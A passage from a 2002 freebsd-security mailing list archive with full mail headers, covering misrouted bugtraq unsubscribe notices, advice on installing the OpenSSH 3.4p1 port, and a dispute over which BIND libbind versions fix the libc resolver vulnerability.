-0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 17:52:06 -0000 Received: (qmail 8068 invoked by alias); 29 Jun 2002 17:47:27 -0000 Received: (qmail 8064 invoked from network); 29 Jun 2002 17:47:26 -0000 Received: from 81-86-164-179.dsl.pipex.com (HELO nelly.internal.irrelevant.org) (81.86.164.179) by mail.securityfocus.com with SMTP; 29 Jun 2002 17:47:26 -0000 Received: from simond by nelly.internal.irrelevant.org with local (Exim 3.36 #1) id 17OMOx-00009E-00 for bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com; Sat, 29 Jun 2002 18:52:51 +0100 Date: Sat, 29 Jun 2002 18:52:51 +0100 From: security@freebsd.org To: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com Message-ID: <20020629175251.GA485@irrelevant.org> References: <1025372817.18079.ezmlm@securityfocus.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1025372817.18079.ezmlm@securityfocus.com> User-Agent: Mutt/1.5.1i Sender: Simon Dick On Sat, Jun 29, 2002 at 05:46:57PM -0000, bugtraq-help@securityfocus.com wrote: > Hi! This is the ezmlm program. I'm managing the > bugtraq@securityfocus.com mailing list. > > I'm working for my owner, who can be reached > at bugtraq-owner@securityfocus.com. > > To confirm that you would like > > security@freebsd.org > > removed from the bugtraq mailing list, please send an empty reply > to this address: > > bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com > > Usually, this happens when you just hit the "reply" button. > If this does not work, simply copy the address and paste it into > the "To:" field of a new message. > > I haven't checked whether your address is currently on the mailing list. > To see what address you used to subscribe, look at the messages you are > receiving from the mailing list. Each message has your address hidden > inside its return path; for example, mary@xdd.ff.com receives messages > with return path: -mary=xdd.ff.com@securityfocus.com. > > Some mail programs are broken and cannot handle long addresses. If you > cannot reply to this request, instead send a message to > and put the entire address listed above > into the "Subject:" line. > > > --- Administrative commands for the bugtraq list --- > > I can handle administrative requests automatically. Please > do not send them to the list address! Instead, send > your message to the correct command address: > > For help and a description of available commands, send a message to: > > > To subscribe to the list, send a message to: > > > To remove your address from the list, just send a message to > the address in the ``List-Unsubscribe'' header of any list > message. If you haven't changed addresses since subscribing, > you can also send a message to: > > > or for the digest to: > > > For addition or removal of addresses, I'll send a confirmation > message to that address. When you receive it, simply reply to it > to complete the transaction. > > If you need to get in touch with the human owner of this list, > please send a message to: > > > > Please include a FORWARDED list message with ALL HEADERS intact > to make it easier to help you. > > --- Enclosed is a copy of the request I received. > > Return-Path: > Received: (qmail 18074 invoked from network); 29 Jun 2002 17:46:57 -0000 > Received: from unknown (HELO securityfocus.com) (66.38.151.9) > by lists.securityfocus.com with SMTP; 29 Jun 2002 17:46:57 -0000 > Received: (qmail 7837 invoked by alias); 29 Jun 2002 17:42:18 -0000 > Date: 29 Jun 2002 17:42:18 -0000 > Message-ID: <20020629174218.7836.qmail@securityfocus.com> > Received: (qmail 7833 invoked from network); 29 Jun 2002 17:42:17 -0000 > Received: from npubs.com (HELO mail.npubs.com) (207.111.208.224) > by mail.securityfocus.com with SMTP; 29 Jun 2002 17:42:17 -0000 > Received: 8.12.2-(Neptune) > From: "NOC" > To: > Subject: > MIME-Version: 1.0 > Content-Type: text/plain; > charset="iso-8859-1" > Content-Transfer-Encoding: 7bit > X-Priority: 3 > X-MSMail-Priority: Normal > X-Mailer: Microsoft Outlook Express 6.00.2600.0000 > X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Simon Dick simond@irrelevant.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 10:54:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D6B1C37B400; Sat, 29 Jun 2002 10:54:09 -0700 (PDT) Received: from smtp.infracaninophile.co.uk (happy-idiot-talk.infracaninophile.co.uk [81.2.69.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id 6620F43E31; Sat, 29 Jun 2002 10:54:02 -0700 (PDT) (envelope-from m.seaman@infracaninophile.co.uk) Received: from happy-idiot-talk.infracaninophile.co.uk (localhost.infracaninophile.co.uk [IPv6:::1]) by smtp.infracaninophile.co.uk (8.12.4/8.12.4) with ESMTP id g5THs1tD018496; Sat, 29 Jun 2002 18:54:01 +0100 (BST) (envelope-from matthew@happy-idiot-talk.infracaninophile.co.uk) Received: (from matthew@localhost) by happy-idiot-talk.infracaninophile.co.uk (8.12.4/8.12.4/Submit) id g5THrut9018495; Sat, 29 Jun 2002 18:53:56 +0100 (BST) Date: Sat, 29 Jun 2002 18:53:56 +0100 From: Matthew Seaman To: Scott Gerhardt Cc: FreeBSD user , FreeBSD , freebsd-security@FreeBSD.ORG Subject: Re: Sshd fix Message-ID: <20020629175356.GB18347@happy-idiot-talk.infracaninophi> References: <20020628190711.M7121-100000@Amber.XtremeDev.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 11:47:10AM -0600, Scott Gerhardt wrote: > Couldn't /usr/ports/security/openssh be used instead? It could, but openssh-portable supports PAM which openssh does not. Otherwise there's not much difference either way. Matthew -- Dr Matthew J Seaman MA, D.Phil. 26 The Paddocks Savill Way Tel: +44 1628 476614 Marlow Fax: +44 0870 0522645 Bucks., SL7 1TH UK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 11:12:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 36D6737B400 for ; Sat, 29 Jun 2002 11:12:36 -0700 (PDT) Received: from lists.securityfocus.com (lists.securityfocus.com [66.38.151.19]) by mx1.FreeBSD.org (Postfix) with SMTP id 9235543E09 for ; Sat, 29 Jun 2002 11:12:35 -0700 (PDT) (envelope-from bugtraq-return-@securityfocus.com) Received: (qmail 18817 invoked by alias); 29 Jun 2002 18:11:45 -0000 Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm List-Help: List-Post: List-Subscribe: Date: 29 Jun 2002 18:11:45 -0000 Message-ID: <1025374305.18816.ezmlm@securityfocus.com> From: bugtraq-help@securityfocus.com To: security@freebsd.org Delivered-To: responder for bugtraq@securityfocus.com Received: (qmail 18811 invoked from network); 29 Jun 2002 18:11:45 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 18:11:45 -0000 Received: (qmail 8949 invoked by alias); 29 Jun 2002 18:07:06 -0000 Received: (qmail 8945 invoked from network); 29 Jun 2002 18:07:05 -0000 Received: from 61-21-223-197.home.ne.jp (HELO areiyu.dip.jp) (61.21.223.197) by mail.securityfocus.com with SMTP; 29 Jun 2002 18:07:05 -0000 Received: from LOW.areiyu.dip.jp ([192.168.12.9]) by areiyu.dip.jp (8.12.4/8.11.6) with SMTP id g5TICYdJ001394 for ; Sun, 30 Jun 2002 03:12:34 +0900 (JST) (envelope-from areiyu@areiyu.dip.jp) MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Subject: ezmlm response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi! This is the ezmlm program. I'm managing the bugtraq@securityfocus.com mailing list. I'm working for my owner, who can be reached at bugtraq-owner@securityfocus.com. I'm sorry, I've been unable to carry out your request, since the address security@freebsd.org was not on the bugtraq mailing list when I received your request and is not a subscriber of this list. If you unsubscribe, but continue to receive mail, you're subscribed under a different address than the one you currently use. Please look at the header for: 'Return-Path: ' This shows that the subscription address is ``user@host.dom''. The unsubscribe address for this user would be: 'bugtraq-unsubscribe-user=host.dom@securityfocus.com'. Just mail to that address, adjusted for the real subscription address. If the message has a ``List-Unsubscribe:'' header, you can send a message to the address in that header. It contains the subscription already coded into it. For some mail programs, you need to make the headers visible to see the return path: For Eudora 4.0, click on the "Blah blah ..." button. For PMMail, click on "Window->Show entire message/header". If this still doesn't work, I'm sorry to say that I can't help you. Please FORWARD a list message together with a note about what you're trying to achieve and a list of addresses that you might be subscribed under to my owner: who will take care of it. My owner is a little bit slower than I am, so please be patient. --- Administrative commands for the bugtraq list --- I can handle administrative requests automatically. Please do not send them to the list address! Instead, send your message to the correct command address: For help and a description of available commands, send a message to: To subscribe to the list, send a message to: To remove your address from the list, just send a message to the address in the ``List-Unsubscribe'' header of any list message. If you haven't changed addresses since subscribing, you can also send a message to: or for the digest to: For addition or removal of addresses, I'll send a confirmation message to that address. When you receive it, simply reply to it to complete the transaction. If you need to get in touch with the human owner of this list, please send a message to: Please include a FORWARDED list message with ALL HEADERS intact to make it easier to help you. --- Enclosed is a copy of the request I received. Return-Path: Received: (qmail 18811 invoked from network); 29 Jun 2002 18:11:45 -0000 Received: from unknown (HELO securityfocus.com) (66.38.151.9) by lists.securityfocus.com with SMTP; 29 Jun 2002 18:11:45 -0000 Received: (qmail 8949 invoked by alias); 29 Jun 2002 18:07:06 -0000 Received: (qmail 8945 invoked from network); 29 Jun 2002 18:07:05 -0000 Received: from 61-21-223-197.home.ne.jp (HELO areiyu.dip.jp) (61.21.223.197) by mail.securityfocus.com with SMTP; 29 Jun 2002 18:07:05 -0000 Received: from LOW.areiyu.dip.jp ([192.168.12.9]) by areiyu.dip.jp (8.12.4/8.11.6) with SMTP id g5TICYdJ001394 for ; Sun, 30 Jun 2002 03:12:34 +0900 (JST) (envelope-from areiyu@areiyu.dip.jp) Message-Id: <200206291824.AA00241@LOW.areiyu.dip.jp> From: areiyu Date: Sun, 30 Jun 2002 03:24:12 +0900 To: bugtraq-uc.1025372817.dcomgaccpemgiccafegg-security=freebsd.org@securityfocus.com Subject: Re: confirm unsubscribe from bugtraq@securityfocus.com In-Reply-To: <1025372817.18079.ezmlm@securityfocus.com> References: <1025372817.18079.ezmlm@securityfocus.com> MIME-Version: 1.0 X-Mailer: AL-Mail32 Version 1.11 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 11:20:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9C1CA37B405 for ; Sat, 29 Jun 2002 11:20:07 -0700 (PDT) Received: from smnolde.com (c-24-98-61-182.atl.client2.attbi.com [24.98.61.182]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0C31443E09 for ; Sat, 29 Jun 2002 11:20:07 -0700 (PDT) (envelope-from scott@smnolde.com) Received: from [192.168.10.7] (helo=bsd.smnolde.com) by smnolde.com with esmtp (TLSv1:DES-CBC3-SHA:168) (Exim 3.36 #1) id 17OMpL-00094o-00; Sat, 29 Jun 2002 14:20:07 -0400 Received: from scott by bsd.smnolde.com with local (Exim 3.33 #1) id 17OMpK-000COH-00; Sat, 29 Jun 2002 14:20:06 -0400 Date: Sat, 29 Jun 2002 14:20:06 -0400 From: "Scott M. Nolde" To: =?iso-8859-1?Q?Arvinn_L=F8kkebakken?= Cc: freebsd-security@FreeBSD.ORG Subject: Re: openssh 3.4p1 ports installation fails Message-ID: <20020629142006.C315@smnolde.com> References: <009a01c21f6c$37f99df0$0201a8c0@dus> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <009a01c21f6c$37f99df0$0201a8c0@dus>; from arvinn@rns.no on Sat, Jun 29, 2002 at 02:55:17PM +0200 X-GPG_Fingerprint: 0BD6 DDB4 2978 EB60 E0C8 33F2 BC34 9087 D869 AB48 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Do a "make distclean" then cvsup your ports again, then try again. It built fine for me yesterday. - Scott Arvinn Løkkebakken(arvinn@rns.no)@2002.06.29 14:55:17 +0000: > On two out of four FreeBSD boxes the port installations of OpenSSH 3.4p1 > stops at this point: > > >> Patch patch-readpassphrase.c failed to apply cleanly. > >> Patch(es) patch-auth.c patch-auth1.c patch-auth2.c patch-clientloop.c > patch-defines.h patch-misc.c applied cleanly. > *** Error code 1 > > Stop in /usr/ports/security/openssh-portable. > > On the other two FreeBSD servers it worked perfectely. Any ideas why this > happened? > > Arvinn -- Scott Nolde GPG Key 0xD869AB48 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 11:35:19 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 489DA37B400 for ; Sat, 29 Jun 2002 11:35:16 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 608A243E09 for ; Sat, 29 Jun 2002 11:35:15 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA12630; Sat, 29 Jun 2002 12:35:03 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629123101.02ed2df0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 12:34:55 -0600 To: Mark.Andrews@isc.org From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: security@FreeBSD.ORG In-Reply-To: <200206290335.g5T3ZUm0059814@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 09:35 PM 6/28/2002, Mark.Andrews@isc.org wrote: > Firstly lib/bind is *not* built by default. You have to > explictly build it with "configure --enable-libbind". If that's so, you may still have an old libbind on your system which is vulnerable. ONLY the libbind from 8.3.3 is immune. > "libbind" is a *copy* of BIND 8's libbind which *is* fixed > in 8.2.6 and 8.3.3. Only in 8.3.3, according to ISC. BIND 9.2.1's libbind is not fixed. See http://www.cert.org/advisories/CA-2002-19.html --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 11:37:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 49ADF37B400 for ; Sat, 29 Jun 2002 11:37:10 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7862D43E09 for ; Sat, 29 Jun 2002 11:37:09 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA12655; Sat, 29 Jun 2002 12:36:46 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629123529.02ce2af0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 12:36:39 -0600 To: Makoto Matsushita , security@FreeBSD.ORG From: Brett Glass Subject: Re: libc resolver fix: can we applied to 3-stable or before? In-Reply-To: <20020629130607U.matusita@jp.FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org We need to know this too. We have some embedded systems based on 2.2.7 and 2.2.8. The vendors are defunct, but we are hoping to patch or shield the systems. --Brett At 10:06 PM 6/28/2002, Makoto Matsushita wrote: >Simple question: Is our 3-stable libc vulnerable? If so, can we apply >the same patch to RELENG_3 also? If 3-stable libc is vulnerable, our >compat3x/libc.so.3.uu bundled with 4-stable (and 5-stable in the >future) is also vulnerable, and it would be good to fix. > >Note that same stories are also applied to libc of 2.2-stable or before. > >-- - >Makoto `MAR' Matsushita > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 13:56:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CF85037B401 for ; Sat, 29 Jun 2002 13:56:31 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 14C0443E0A for ; Sat, 29 Jun 2002 13:56:31 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 6032A8B5B1; Sat, 29 Jun 2002 13:56:30 -0700 (PDT) Message-ID: <3D1E1EFD.6B096D3E@FreeBSD.org> Date: Sat, 29 Jun 2002 13:56:29 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Makoto Matsushita Cc: security@FreeBSD.ORG Subject: Re: libc resolver fix: can we applied to 3-stable or before? References: <20020629130607U.matusita@jp.FreeBSD.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Makoto Matsushita wrote: > > Simple question: Is our 3-stable libc vulnerable? According to some information I have, the bug goes all the back to 1990, or so. Therefore I'd say yes, it's very likely to be vulnerable, but it should be pretty easy for you to use cvsweb and diff the files. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:28: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A6F3837B400 for ; Sat, 29 Jun 2002 14:27:55 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id 48C3943E06 for ; Sat, 29 Jun 2002 14:27:55 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id EE0108B5DE; Sat, 29 Jun 2002 14:27:38 -0700 (PDT) Message-ID: <3D1E264A.5463BA96@FreeBSD.org> Date: Sat, 29 Jun 2002 14:27:38 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Mark.Andrews@isc.org, security@FreeBSD.ORG Subject: Re: libc flaw: BIND 9 closes most holes but also opens one References: <4.3.2.7.2.20020629123101.02ed2df0@localhost> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Brett Glass wrote: > > At 09:35 PM 6/28/2002, Mark.Andrews@isc.org wrote: > > > Firstly lib/bind is *not* built by default. You have to > > explictly build it with "configure --enable-libbind". > > If that's so, you may still have an old libbind on your system > which is vulnerable. ONLY the libbind from 8.3.3 is immune. > > > "libbind" is a *copy* of BIND 8's libbind which *is* fixed > > in 8.2.6 and 8.3.3. > > Only in 8.3.3, according to ISC. BIND 9.2.1's libbind is not fixed. Brett, The libbind bug is fixed in both 8.2.6, and 8.3.3. Please be more careful to read what is posted before responding. That said, if you are going to run a BIND 8 server, I think you're a lot better off with 8.3.3. But the fix is available for those who can't upgrade, for whatever reason. Thanks, Doug ftp://ftp.isc.org/isc/bind/src/8.2.6/825-826.diff -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:35:27 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C1E337B401; Sat, 29 Jun 2002 14:35:24 -0700 (PDT) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 02E0143E13; Sat, 29 Jun 2002 14:35:23 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA13863; Sat, 29 Jun 2002 15:35:12 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020629153253.02e88ef0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Sat, 29 Jun 2002 15:35:02 -0600 To: Doug Barton From: Brett Glass Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Cc: Mark.Andrews@isc.org, security@FreeBSD.org In-Reply-To: <3D1E264A.5463BA96@FreeBSD.org> References: <4.3.2.7.2.20020629123101.02ed2df0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 03:27 PM 6/29/2002, Doug Barton wrote: > The libbind bug is fixed in both 8.2.6, and 8.3.3. Please be more >careful to read what is posted before responding. I know that there were earlier fixes to prevent buffer overrruns. My impression, based on ISC's statements, is that more were required after that time. Have you done a diff between 8.2.6 and 8.3.3? >That said, if you are >going to run a BIND 8 server, I think you're a lot better off with >8.3.3. I want to run a BIND 9 server, because it will protect vulnerable machines and apps behind it. But it looks as if I'll need to get libbind out of 8.3.3, too, unless there's a new release of BIND 9 that includes it. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:37:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EFF9737B400; Sat, 29 Jun 2002 14:37:18 -0700 (PDT) Received: from mail.XtremeDev.com (xtremedev.com [216.241.38.65]) by mx1.FreeBSD.org (Postfix) with ESMTP id 74AF743E0A; Sat, 29 Jun 2002 14:37:18 -0700 (PDT) (envelope-from freebsd@XtremeDev.com) Received: from xtremedev.com (xtremedev.com [216.241.38.65]) by mail.XtremeDev.com (Postfix) with ESMTP id 583A170601; Sat, 29 Jun 2002 15:37:11 -0600 (MDT) Date: Sat, 29 Jun 2002 15:37:11 -0600 (MDT) From: FreeBSD user To: Scott Gerhardt Cc: FreeBSD , Subject: Re: Sshd fix In-Reply-To: Message-ID: <20020629153555.C94025-100000@Amber.XtremeDev.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org From what I've read on here, ports/security/openssh is native OpenBSD/NetBSD version of OpenSSH, whereas ports/security/openssh-portable is what everyone else uses. Plus the fact that ports/security/openssh doesn't have the OPENSSH_OVERWRITE_BASE option available. On Sat, 29 Jun 2002, Scott Gerhardt wrote: > Couldn't /usr/ports/security/openssh be used instead? > > -- > Scott > > > On 6/28/02 7:07 PM, "FreeBSD user" wrote: > > > cd /usr/ports/security/openssh-portable && make -DOPENSSH_OVERWRITE_BASE > > install distclean > > > > On Fri, 28 Jun 2002, Scott Gerhardt wrote: > > > >> For the sshd fix, could't I just strip the base openssh from the system and > >> install the updated openssh-3.4 from the ports? > >> > >> If so, what is the best method to disable/eliminate openssh from the base > >> system? > >> > >> > >> Have a happy Canada Day weekend :-) > >> > >> Regards, > >> > >> > >> -- > >> Scott Gerhardt, P.Geo. > >> Gerhardt Information Technologies [G-IT] > >> > >> > >> > >> To Unsubscribe: send mail to majordomo@FreeBSD.org > >> with "unsubscribe freebsd-questions" in the body of the message > >> > >> > >> > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > -- > Scott Gerhardt, P.Geo. > Gerhardt Information Technologies [G-IT] > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:43:14 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9AFC537B400 for ; Sat, 29 Jun 2002 14:43:10 -0700 (PDT) Received: from bastet.rfc822.net (bastet.rfc822.net [64.81.113.233]) by mx1.FreeBSD.org (Postfix) with ESMTP id 15C9A43E0A for ; Sat, 29 Jun 2002 14:43:10 -0700 (PDT) (envelope-from pde@bastet.rfc822.net) Received: by bastet.rfc822.net (Postfix, from userid 1001) id B5B959FD21; Sat, 29 Jun 2002 16:43:12 -0500 (CDT) Date: Sat, 29 Jun 2002 16:43:12 -0500 From: Pete Ehlke To: security@FreeBSD.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one Message-ID: <20020629214312.GA20882@rfc822.net> References: <200206282259.QAA03790@lariat.org> <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020629153253.02e88ef0@localhost> User-Agent: Mutt/1.3.27i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, Jun 29, 2002 at 03:35:02PM -0600, Brett Glass wrote: > At 03:27 PM 6/29/2002, Doug Barton wrote: > > > The libbind bug is fixed in both 8.2.6, and 8.3.3. Please be more > >careful to read what is posted before responding. > > I know that there were earlier fixes to prevent buffer overrruns. > My impression, based on ISC's statements, is that more were required > after that time. Have you done a diff between 8.2.6 and 8.3.3? > Please, Brett. Don't embarass yourself further on this. http://marc.theaimsgroup.com/?l=bind-announce&m=102527571007047&w=2 http://marc.theaimsgroup.com/?l=bind-announce&m=102527570707030&w=2 -Pete To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Jun 29 14:45: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3684437B401 for ; Sat, 29 Jun 2002 14:45:00 -0700 (PDT) Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by mx1.FreeBSD.org (Postfix) with ESMTP id A8EA743E09 for ; Sat, 29 Jun 2002 14:44:59 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 4486E8B5A4; Sat, 29 Jun 2002 14:44:59 -0700 (PDT) Message-ID: <3D1E2A5A.522E53C7@FreeBSD.org> Date: Sat, 29 Jun 2002 14:44:58 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Brett Glass Cc: Mark.Andrews@isc.org, security@FreeBSD.org Subject: Re: libc flaw: BIND 9 closes most holes but also opens one References: <4.3.2.7.2.20020629123101.02ed2df0@localhost> <4.3.2.7.2.20020629153253.02e88ef0@localhost> 